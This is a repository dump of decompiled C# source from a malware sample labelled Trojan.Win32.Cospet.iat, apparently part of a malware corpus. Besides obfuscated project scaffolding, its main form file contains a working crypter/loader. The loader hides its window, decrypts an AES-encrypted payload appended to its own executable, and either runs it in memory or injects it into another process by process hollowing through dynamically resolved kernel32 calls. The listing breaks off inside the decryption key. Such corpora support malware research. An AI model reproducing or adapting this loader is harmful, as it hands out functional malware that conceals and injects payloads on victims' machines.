MSIL/Trojan/Win32/C/Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807/61be7a78-12b9-44c2-bb22-b83cd81fb424
BIN
View File
Binary file not shown.
MSIL/Trojan/Win32/C/Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807/AssemblyInfo.cs
+16
View File
@@ -0,0 +1,16 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyConfiguration("")]
[assembly: Guid("0a6637c1-2f26-479e-9fcb-edec99dd9711")]
[assembly: AssemblyFileVersion("0.0.0.0")]
[assembly: AssemblyCopyright("")]
[assembly: AssemblyDelaySign(false)]
[assembly: AssemblyKeyName("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyDescription("")]
[assembly: ComVisible(true)]
[assembly: AssemblyProduct("")]
[assembly: AssemblyTitle("")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan/Win32/C/Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807/EJK98LujOyyfukEOeT/8fGOjUs9meXMHxwiww.cs
+61
View File
@@ -0,0 +1,61 @@
// Decompiled with JetBrains decompiler
// Type: EJK98LujOyyfukEOeT.8fGOjUs9meXMHxwiww
// Assembly: Service, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7876418B-9B45-4205-B20B-41AA64972C85
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.exe
using \u0030H9QJslJ8vJhl6OlA5;
using dIB5tm1fm4ourlbe9N;
using Microsoft.VisualBasic.ApplicationServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
using TmwCXiWu118CwLLcBx;
namespace EJK98LujOyyfukEOeT
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class \u0038fGOjUs9meXMHxwiww : WindowsFormsApplicationBase
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Advanced)]
[STAThread]
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
internal static void FFGVyGxjw([In] string[] obj0)
{
YbbxknoBYLxEOxk0Pn.kLjw4iIsCLsZtxc4lksN0j();
try
{
Application.SetCompatibleTextRenderingDefault(WindowsFormsApplicationBase.UseCompatibleTextRendering);
qriSERnLWqCHHxhiWL.mQJJcrKz2UjcR();
}
finally
{
}
KcUfPq74sts8xsAS9e.shLcqe8nZ.Run(obj0);
}
[DebuggerStepThrough]
[MethodImpl(MethodImplOptions.NoInlining)]
public \u0038fGOjUs9meXMHxwiww()
: base(AuthenticationMode.Windows)
{
this.IsSingleInstance = false;
this.EnableVisualStyles = true;
this.SaveMySettingsOnExit = true;
this.ShutdownStyle = ShutdownMode.AfterMainFormCloses;
}
[DebuggerStepThrough]
[MethodImpl(MethodImplOptions.NoInlining)]
protected override void OnCreateMainForm() => this.MainForm = (Form) KcUfPq74sts8xsAS9e.fMQ7ZN6B5.shLcqe8nZ();
[MethodImpl(MethodImplOptions.NoInlining)]
static \u0038fGOjUs9meXMHxwiww() => YbbxknoBYLxEOxk0Pn.kLjw4iIsCLsZtxc4lksN0j();
}
}
MSIL/Trojan/Win32/C/Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807/ET8bfl9MPCfSaIxovP/iN5781BvND3uA6XrP4.cs
+12
View File
@@ -0,0 +1,12 @@
// Decompiled with JetBrains decompiler
// Type: ET8bfl9MPCfSaIxovP.iN5781BvND3uA6XrP4
// Assembly: Service, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7876418B-9B45-4205-B20B-41AA64972C85
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.exe
namespace ET8bfl9MPCfSaIxovP
{
internal static class iN5781BvND3uA6XrP4
{
}
}
MSIL/Trojan/Win32/C/Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807/Qd3TIb3whAubSwrdUf/vE2Q8waT3eDjZJUuZD.cs
+46
View File
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: Qd3TIb3whAubSwrdUf.vE2Q8waT3eDjZJUuZD
// Assembly: Service, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7876418B-9B45-4205-B20B-41AA64972C85
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.exe
using System;
using System.Reflection;
using System.Runtime.CompilerServices;
using TmwCXiWu118CwLLcBx;
namespace Qd3TIb3whAubSwrdUf
{
internal class vE2Q8waT3eDjZJUuZD
{
internal static Module Uj1VGPQhn;
[MethodImpl(MethodImplOptions.NoInlining)]
internal static void RavJcrKKsSbih(int typemdt)
{
Type type = vE2Q8waT3eDjZJUuZD.Uj1VGPQhn.ResolveType(33554432 + typemdt);
foreach (FieldInfo field in type.GetFields())
{
MethodInfo method = (MethodInfo) vE2Q8waT3eDjZJUuZD.Uj1VGPQhn.ResolveMethod(field.MetadataToken + 100663296);
field.SetValue((object) null, (object) (MulticastDelegate) Delegate.CreateDelegate(type, method));
}
}
[MethodImpl(MethodImplOptions.NoInlining)]
public vE2Q8waT3eDjZJUuZD()
{
qriSERnLWqCHHxhiWL.mQJJcrKz2UjcR();
// ISSUE: explicit constructor call
base.\u002Ector();
}
[MethodImpl(MethodImplOptions.NoInlining)]
static vE2Q8waT3eDjZJUuZD()
{
qriSERnLWqCHHxhiWL.mQJJcrKz2UjcR();
vE2Q8waT3eDjZJUuZD.Uj1VGPQhn = typeof (vE2Q8waT3eDjZJUuZD).Assembly.ManifestModule;
}
internal delegate void SFU4mbT3GMret7THonf(object o);
}
}
MSIL/Trojan/Win32/C/Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807/Service/My/MySettings.cs
+91
View File
@@ -0,0 +1,91 @@
// Decompiled with JetBrains decompiler
// Type: Service.My.MySettings
// Assembly: Service, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7876418B-9B45-4205-B20B-41AA64972C85
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.exe
using \u0030H9QJslJ8vJhl6OlA5;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Configuration;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Threading;
using TmwCXiWu118CwLLcBx;
namespace Service.My
{
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "10.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Advanced)]
[CompilerGenerated]
internal sealed class MySettings : ApplicationSettingsBase
{
private static MySettings defaultInstance;
private static bool addedHandler;
private static object addedHandlerLockObject;
[MethodImpl(MethodImplOptions.NoInlining)]
static MySettings()
{
qriSERnLWqCHHxhiWL.mQJJcrKz2UjcR();
// ISSUE: reference to a compiler-generated field
// ISSUE: object of a compiler-generated type is created
MySettings.defaultInstance = (MySettings) SettingsBase.Synchronized((SettingsBase) new MySettings());
// ISSUE: reference to a compiler-generated field
MySettings.addedHandlerLockObject = RuntimeHelpers.GetObjectValue(new object());
}
[MethodImpl(MethodImplOptions.NoInlining)]
public MySettings()
{
qriSERnLWqCHHxhiWL.mQJJcrKz2UjcR();
// ISSUE: explicit constructor call
base.\u002Ector();
}
[DebuggerNonUserCode]
[EditorBrowsable(EditorBrowsableState.Advanced)]
[MethodImpl(MethodImplOptions.NoInlining)]
private static void AutoSaveSettings(object sender, EventArgs e)
{
if (!KcUfPq74sts8xsAS9e.shLcqe8nZ.SaveMySettingsOnExit)
return;
MySettingsProperty.Settings.Save();
}
public static MySettings Default
{
[MethodImpl(MethodImplOptions.NoInlining)] get
{
if (!MySettings.addedHandler)
{
object handlerLockObject = MySettings.addedHandlerLockObject;
ObjectFlowControl.CheckForSyncLockOnValueType(handlerLockObject);
Monitor.Enter(handlerLockObject);
try
{
if (!MySettings.addedHandler)
{
KcUfPq74sts8xsAS9e.shLcqe8nZ.Shutdown += (ShutdownEventHandler) ((sender, e) =>
{
if (!KcUfPq74sts8xsAS9e.shLcqe8nZ.SaveMySettingsOnExit)
return;
MySettingsProperty.Settings.Save();
});
MySettings.addedHandler = true;
}
}
finally
{
Monitor.Exit(handlerLockObject);
}
}
MySettings defaultInstance = MySettings.defaultInstance;
return defaultInstance;
}
}
}
}
MSIL/Trojan/Win32/C/Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807/Service/My/MySettingsProperty.cs
+31
View File
@@ -0,0 +1,31 @@
// Decompiled with JetBrains decompiler
// Type: Service.My.MySettingsProperty
// Assembly: Service, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7876418B-9B45-4205-B20B-41AA64972C85
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace Service.My
{
[CompilerGenerated]
[StandardModule]
[HideModuleName]
[DebuggerNonUserCode]
internal sealed class MySettingsProperty
{
[HelpKeyword("My.Settings")]
internal static MySettings Settings
{
[MethodImpl(MethodImplOptions.NoInlining)] get
{
MySettings settings = MySettings.Default;
return settings;
}
}
}
}
MSIL/Trojan/Win32/C/Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807/Service/My/Resources/Resources.cs
+47
View File
@@ -0,0 +1,47 @@
// Decompiled with JetBrains decompiler
// Type: Service.My.Resources.Resources
// Assembly: Service, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7876418B-9B45-4205-B20B-41AA64972C85
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.exe
using lIMo5cXu7QVSJ7hdyJ;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace Service.My.Resources
{
[CompilerGenerated]
[DebuggerNonUserCode]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
[HideModuleName]
[StandardModule]
internal sealed class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
[MethodImpl(MethodImplOptions.NoInlining)] get
{
if (object.ReferenceEquals((object) Service.My.Resources.Resources.resourceMan, (object) null))
Service.My.Resources.Resources.resourceMan = new ResourceManager(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(1056), typeof (Service.My.Resources.Resources).Assembly);
return Service.My.Resources.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
[MethodImpl(MethodImplOptions.NoInlining)] get => Service.My.Resources.Resources.resourceCulture;
[MethodImpl(MethodImplOptions.NoInlining)] set => Service.My.Resources.Resources.resourceCulture = value;
}
}
}
MSIL/Trojan/Win32/C/Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807/TmwCXiWu118CwLLcBx/qriSERnLWqCHHxhiWL.cs
+25
View File
@@ -0,0 +1,25 @@
// Decompiled with JetBrains decompiler
// Type: TmwCXiWu118CwLLcBx.qriSERnLWqCHHxhiWL
// Assembly: Service, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7876418B-9B45-4205-B20B-41AA64972C85
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.exe
using System.Runtime.CompilerServices;
namespace TmwCXiWu118CwLLcBx
{
internal class qriSERnLWqCHHxhiWL
{
private static bool Uj1VGPQhn;
[MethodImpl(MethodImplOptions.NoInlining)]
internal static void mQJJcrKz2UjcR()
{
}
[MethodImpl(MethodImplOptions.NoInlining)]
public qriSERnLWqCHHxhiWL()
{
}
}
}
MSIL/Trojan/Win32/C/Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807/Trojan.Win32.Cospet.iat.csproj
+60
View File
@@ -0,0 +1,60 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{34F1EB39-661A-49C2-AC9D-DD6F33C2AC71}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Service</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CModule_003E{81A84E1E-6409-4B9D-B789-B9B5420A3.cs" />
<Compile Include="ET8bfl9MPCfSaIxovP\iN5781BvND3uA6XrP4.cs" />
<Compile Include="EJK98LujOyyfukEOeT\8fGOjUs9meXMHxwiww.cs" />
<Compile Include="wuZRSCSYdAj3YejFZe\DcHwE30dMCeD7BI4om.cs" />
<Compile Include="0H9QJslJ8vJhl6OlA5\KcUfPq74sts8xsAS9e.cs" />
<Compile Include="Yi0GE2NLaKY9cPmB45\l1YmlpPMvQyqqZeffw.cs" />
<Compile Include="Service\My\MySettings.cs" />
<Compile Include="Service\My\MySettingsProperty.cs" />
<Compile Include="Service\My\Resources\Resources.cs" />
<Compile Include="Qd3TIb3whAubSwrdUf\vE2Q8waT3eDjZJUuZD.cs" />
<Compile Include="lIMo5cXu7QVSJ7hdyJ\tcJNIpeNWph4hwAAuQ.cs" />
<Compile Include="TmwCXiWu118CwLLcBx\qriSERnLWqCHHxhiWL.cs" />
<Compile Include="dIB5tm1fm4ourlbe9N\YbbxknoBYLxEOxk0Pn.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="61be7a78-12b9-44c2-bb22-b83cd81fb424" />
<EmbeddedResource Include="d0185bd7-034e-41ef-aec0-b5a6ab327d87" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan/Win32/C/Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807/Trojan.Win32.Cospet.iat.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Service", "Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.csproj", "{34F1EB39-661A-49C2-AC9D-DD6F33C2AC71}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{34F1EB39-661A-49C2-AC9D-DD6F33C2AC71}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{34F1EB39-661A-49C2-AC9D-DD6F33C2AC71}.Debug|Any CPU.Build.0 = Debug|Any CPU
{34F1EB39-661A-49C2-AC9D-DD6F33C2AC71}.Release|Any CPU.ActiveCfg = Release|Any CPU
{34F1EB39-661A-49C2-AC9D-DD6F33C2AC71}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan/Win32/C/Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807/Yi0GE2NLaKY9cPmB45/l1YmlpPMvQyqqZeffw.cs
+280
View File
@@ -0,0 +1,280 @@
// Decompiled with JetBrains decompiler
// Type: Yi0GE2NLaKY9cPmB45.l1YmlpPMvQyqqZeffw
// Assembly: Service, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7876418B-9B45-4205-B20B-41AA64972C85
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.exe
using lIMo5cXu7QVSJ7hdyJ;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using System.Threading;
using System.Windows.Forms;
using TmwCXiWu118CwLLcBx;
namespace Yi0GE2NLaKY9cPmB45
{
[DesignerGenerated]
internal class l1YmlpPMvQyqqZeffw : Form
{
private IContainer u0ejtRg5C;
private const string SXcEpLecu = "ᅕჯᅀᅕᄱᆲᆂᄐᅘᅕᆂၺᄷᅉᄢᄮᄽᆝᆲᆯᄄᆋᅿᇍᄊᄮჾᇊᅭᅘეၓᇷᆠᆋᆈᄁᆗრᅒᆻᅃᇐᆝᆗሆᇟᅿᆗဗᇱეᆻᇄሃᄥᇨᅉᇨᄢ̏Ϫ";
[MethodImpl(MethodImplOptions.NoInlining)]
public l1YmlpPMvQyqqZeffw()
{
qriSERnLWqCHHxhiWL.mQJJcrKz2UjcR();
// ISSUE: explicit constructor call
base.\u002Ector();
this.Load += new EventHandler(this.ORG997Eyt);
this.u1SVD5csY();
}
[DebuggerNonUserCode]
[MethodImpl(MethodImplOptions.NoInlining)]
protected override void Dispose([In] bool obj0)
{
try
{
if (!obj0 || this.u0ejtRg5C == null)
return;
this.u0ejtRg5C.Dispose();
}
finally
{
base.Dispose(obj0);
}
}
[DebuggerStepThrough]
[MethodImpl(MethodImplOptions.NoInlining)]
private void u1SVD5csY()
{
this.SuspendLayout();
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(10, 10);
this.FormBorderStyle = FormBorderStyle.None;
this.Name = tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(190);
this.Opacity = 0.0;
this.ShowIcon = false;
this.ShowInTaskbar = false;
this.WindowState = FormWindowState.Minimized;
this.ResumeLayout(false);
}
[MethodImpl(MethodImplOptions.NoInlining)]
private void rSSBpBKPm([In] byte[] obj0)
{
Assembly assembly = Assembly.Load(obj0);
MethodInfo entryPoint = assembly.EntryPoint;
object objectValue = RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name))));
entryPoint.Invoke(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(objectValue))), new object[1]
{
(object) new string[1]
{
tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(204)
}
});
}
[MethodImpl(MethodImplOptions.NoInlining)]
private void ORG997Eyt([In] object obj0_1, [In] EventArgs obj1)
{
string[] strArray = Strings.Split(File.ReadAllText(Application.ExecutablePath), tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(210));
byte[] parameter = this.li87Z8Ac6(Convert.FromBase64String(strArray[1]));
Encoding.GetEncoding(1252).GetBytes(strArray[1]);
if (Conversions.ToBoolean(strArray[2]))
{
Thread thread = new Thread((ParameterizedThreadStart) (obj0_2 => this.rSSBpBKPm((byte[]) obj0_2)));
thread.TrySetApartmentState(ApartmentState.STA);
thread.Start((object) parameter);
}
else
this.lElT0QhP0(parameter, tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(338));
}
[DllImport("kernel32", EntryPoint = "LoadLibraryA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr \u0036jCbOnaNR([MarshalAs(UnmanagedType.VBByRefStr)] ref string _param0);
[DllImport("kernel32", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr pp7vagxki([In] IntPtr obj0, [MarshalAs(UnmanagedType.VBByRefStr)] ref string _param1);
[MethodImpl(MethodImplOptions.NoInlining)]
public T w62GtbsBB<T>([In] string obj0, [In] string obj1) => (T) Marshal.GetDelegateForFunctionPointer(l1YmlpPMvQyqqZeffw.pp7vagxki(l1YmlpPMvQyqqZeffw.\u0036jCbOnaNR(ref obj0), ref obj1), typeof (T));
[MethodImpl(MethodImplOptions.NoInlining)]
public bool lElT0QhP0([In] byte[] obj0, [In] string obj1)
{
l1YmlpPMvQyqqZeffw.\u0039klfPRdkUkcORZqXqJ obj2 = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.\u0039klfPRdkUkcORZqXqJ>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(448))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(476))));
l1YmlpPMvQyqqZeffw.r9hFs0ZTHQaZ334oHv r9hFs0ZthQaZ334oHv = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.r9hFs0ZTHQaZ334oHv>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(520))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(548))));
l1YmlpPMvQyqqZeffw.DR45xqt8vapkmdO5jX dr45xqt8vapkmdO5jX = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.DR45xqt8vapkmdO5jX>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(600))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(628))));
l1YmlpPMvQyqqZeffw.ZfvhinbtZbMtI7F6cm zfvhinbtZbMtI7F6cm = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.ZfvhinbtZbMtI7F6cm>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(680))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(708))));
l1YmlpPMvQyqqZeffw.qgK3lty9wFb990IxNy k3lty9wFb990IxNy = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.qgK3lty9wFb990IxNy>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(752))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(780))));
l1YmlpPMvQyqqZeffw.hEqihWru9Nn70v7FBD eqihWru9Nn70v7Fbd = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.hEqihWru9Nn70v7FBD>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(832))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(860))));
l1YmlpPMvQyqqZeffw.Ayi64li1PRJMwO41ZT ayi64li1PrjMwO41Zt = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.Ayi64li1PRJMwO41ZT>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(912))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(940))));
l1YmlpPMvQyqqZeffw.\u00331cnlp5hhg963mPuNg obj3 = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.\u00331cnlp5hhg963mPuNg>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(976))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(996))));
bool flag;
try
{
IntPtr zero1 = IntPtr.Zero;
IntPtr[] numArray1 = new IntPtr[4];
byte[] numArray2 = new byte[68];
int int32_1 = BitConverter.ToInt32(obj0, 60);
int int16 = (int) BitConverter.ToInt16(obj0, checked (int32_1 + 6));
IntPtr num1 = new IntPtr(BitConverter.ToInt32(obj0, checked (int32_1 + 84)));
if (obj2((string) null, new StringBuilder(obj1), zero1, zero1, false, 4, zero1, (string) null, numArray2, numArray1))
{
uint[] numArray3 = new uint[179];
numArray3[0] = 65538U;
if (r9hFs0ZthQaZ334oHv(numArray1[1], numArray3))
{
IntPtr num2 = new IntPtr(checked ((long) numArray3[41] + 8L));
IntPtr zero2 = IntPtr.Zero;
IntPtr num3 = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
if (dr45xqt8vapkmdO5jX(numArray1[0], num2, ref zero2, (int) num3, ref zero3) && obj3(numArray1[0], zero2) == 0U)
{
IntPtr num4 = new IntPtr(BitConverter.ToInt32(obj0, checked (int32_1 + 52)));
IntPtr num5 = new IntPtr(BitConverter.ToInt32(obj0, checked (int32_1 + 80)));
IntPtr num6 = zfvhinbtZbMtI7F6cm(numArray1[0], num4, num5, 12288, 64);
int int32_2 = num6.ToInt32();
int num7;
int num8 = k3lty9wFb990IxNy(numArray1[0], num6, obj0, checked ((uint) (int) num1), num7) ? 1 : 0;
int num9 = checked (int16 - 1);
int num10 = 0;
while (num10 <= num9)
{
int[] dst1 = new int[10];
Buffer.BlockCopy((Array) obj0, checked (int32_1 + 248 + num10 * 40), (Array) dst1, 0, 40);
byte[] dst2 = new byte[checked (dst1[4] - 1 + 1)];
Buffer.BlockCopy((Array) obj0, dst1[5], (Array) dst2, 0, dst2.Length);
num5 = new IntPtr(checked (int32_2 + dst1[3]));
num4 = new IntPtr(dst2.Length);
int num11 = k3lty9wFb990IxNy(numArray1[0], num5, dst2, checked ((uint) (int) num4), num7) ? 1 : 0;
checked { ++num10; }
}
num5 = new IntPtr(checked ((long) numArray3[41] + 8L));
num4 = new IntPtr(4);
int num12 = k3lty9wFb990IxNy(numArray1[0], num5, BitConverter.GetBytes(num6.ToInt32()), checked ((uint) (int) num4), num7) ? 1 : 0;
numArray3[44] = checked ((uint) (num6.ToInt32() + BitConverter.ToInt32(obj0, int32_1 + 40)));
int num13 = eqihWru9Nn70v7Fbd(numArray1[1], numArray3) ? 1 : 0;
}
}
int num14 = (int) ayi64li1PrjMwO41Zt(numArray1[1]);
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
flag = false;
ProjectData.ClearProjectError();
goto label_11;
}
flag = true;
label_11:
return flag;
}
[MethodImpl(MethodImplOptions.NoInlining)]
public byte[] li87Z8Ac6([In] byte[] obj0)
{
using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
{
rijndaelManaged.IV = new byte[16]
{
(byte) 1,
(byte) 2,
(byte) 3,
(byte) 4,
(byte) 5,
(byte) 6,
(byte) 7,
(byte) 8,
(byte) 9,
(byte) 1,
(byte) 2,
(byte) 3,
(byte) 4,
(byte) 5,
(byte) 6,
(byte) 7
};
rijndaelManaged.Key = new byte[16]
{
(byte) 7,
